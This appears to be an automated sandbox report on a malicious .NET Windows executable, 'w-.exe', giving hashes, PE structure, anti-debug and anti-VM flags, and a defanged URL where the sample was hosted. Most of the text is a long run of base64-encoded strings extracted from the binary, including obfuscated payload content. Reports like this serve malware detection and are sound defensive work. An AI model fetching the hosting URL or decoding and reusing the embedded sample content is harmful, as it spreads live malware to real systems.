MalScore
100/100

w-.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 39/68 Related 2805
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 305.50 KB (312832 bytes)
Compile time: 2018-04-13 11:34:01
MD5: f901b42116f1f8a52cc3abe6d8181135
SHA1: 09e6a2744d998d2a9d72c164998a19ba2638c3c6
SHA256: 46715abb1e5a7ea1409b29d6fea42c45ce0dfb6c40085a07cab428c78a44a4a1
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
Anti Virtual Machine 1 Virtual Box
First submission: 2018-04-17 10:30:07
Last submission: 2018-04-17 10:30:07
Filename detected: - w-.exe (1)
URL file hosting
hXXp://realestatecurve.com/w-.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-14 18:03:05 [39/68] VirusTotal
PE Sections 1 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x13b64 80896 2a3d48afe32b51c135b750866a0551bd 9d9901d92d404db7154c8fa8371eda08e45d5e7a
.rsrc 0x16000 0x385a8 230912 b3eb2db9e350a5df60b1bd7d5081e151 a39626778bfc4d4746a1156d73374b62b16a634d
.reloc 0x50000 0xc 512 bb84ca5458742cc2f132af5f9db40e41 f22679aaaef6dbd29de99a8f996635fd0bec942b
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x40e30 1128 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x41298 132 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x4131c 636 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x41598 52766 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x4e3b8 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: lnkM90SqGDwc1s67.enc.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: lnkM90SqGDwc1s67.enc.exe
ProductVersion: 0.0.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
RGVidWdnZXIgZGV0ZWN0ZWQgIQ== UlNSQ05BTUU= UlNSQ1BXRA==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